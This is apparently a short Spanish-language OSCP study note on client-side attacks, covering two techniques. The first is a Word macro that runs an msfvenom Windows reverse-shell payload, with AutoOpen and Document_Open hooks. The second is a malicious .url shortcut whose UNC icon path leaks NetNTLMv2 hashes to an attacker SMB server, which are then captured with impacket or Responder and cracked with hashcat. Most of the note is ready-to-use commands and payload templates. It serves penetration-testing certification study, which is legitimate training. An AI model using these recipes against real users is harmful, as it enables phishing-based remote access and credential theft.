# Client-side attacks > Atacas a un **usuario** (que abre un documento/enlace), no a un servicio. Fuente: oscp.trastero.org/clientside. ## Macro de Word (VBA) ```bash msfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 -f hta-psh -o evil.hta # → msfvenom python3 split.py # parte el payload codificado en trozos de 50 chars para el VBA ``` - VBA con `Sub AutoOpen()` y `Sub Document_Open()` que reconstruye y ejecuta el PowerShell. - **Guardar como "Documento de Word 97-2003" (.doc)** para que conserve la macro. - Verificar: `olevba evil.doc`. ## Acceso directo malicioso (.url / .lnk) ```ini [InternetShortcut] URL=file://TU_IP IconFile=\\TU_IP\SERVER\%USERNAME%.icon IconIndex=1 ``` - El `IconFile` con ruta **UNC** fuerza al cliente a autenticar contra tu SMB → **capturas su hash NetNTLMv2**. ```bash impacket-smbserver -smb2support SERVER $(pwd) # o Responder → Herramientas (índice) ``` - El hash capturado → Cracking de contraseñas (`hashcat -m 5600`) o relay. Relacionado: AV evasion · Cracking de contraseñas · Authentication attacks · OSCP MOC